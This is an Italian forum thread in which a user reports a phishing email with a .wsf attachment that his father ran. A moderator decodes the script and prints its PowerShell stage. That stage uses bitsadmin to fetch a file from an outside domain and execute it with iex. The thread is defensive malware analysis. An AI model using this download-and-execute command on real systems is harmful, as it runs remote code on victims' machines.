Domanda Possibile malware dalla PEC

Dany_Glitch33

Utente Electrum
20 Aprile 2020
628
123
160
Ultima modifica:
Ciao a tutti, oggi alla PEC di mio padre è arrivata una mail contenente un file "documento-fiscale-(codice fiscale di mio padre).zip" con tre file "fiscale": ha detto che il pdf e il png risultavano impossibili da aprire, ma non il .wsf, che ha eseguito. Quando me l'ha detto ho pensato che si trattasse sicuramente di un malware, quindi l'ho aperto con Notepad e ho visto che è in Visual Basic. Però, fino all'aprire PowerShell, non ho capito la parte restante del codice. L'ho caricato qui sotto, così qualcuno di voi che conosce il linguaggio può capire cosa fa e scriverlo qui sotto, grazie.


P.S.: ho notato che molte scritte sono al contrario
 

0xbro

Moderatore
24 Febbraio 2017
3,490
2,687
959
Ultima modifica:
Mmmm il codice sostanzilamente crea un link a powershell ed esegue uno script che sembra scaricare ed eseguire qualcosa:
Il codice powershell
Codice:
powershell -c &""{
bitsadmin /transfer NkNZyTlr https://leonelmachava.com/leo/.../novo.rtf %programdata%\novo.rtf;
$mc=gc %programdata%\novo.rtf | Out-String; $mc |iex
}""
scarica utilizzando bitsadmin /transfer il contenuto di https://leonelmachava.com/leo/.../novo.rtf dentro %programdata%\novo.rtf, ne legge poi il contenuto (gc sta per Get-Content) e lo esegue utilizzando iex

La PEC arrivava da qualcuno di conosciuto oppure da un indirizzo mai visto prima?

Guardando dalla WaybackMachine il dominio leonelmachava.com risultava online l'ultima volta nel 2014, ed era un blog statico in wordpress:
1631605036354.png



Ora però non mi pare che sia ancora up, io personalmente non riesco a raggiungerlo
 
  • Grazie
Reactions: Dany_Glitch33
Banner pubblicitario per Bright Data su Inforge.net azienda di vendita Proxy, Data Collector e Content Unlocker
Supporta Inforge con una donazione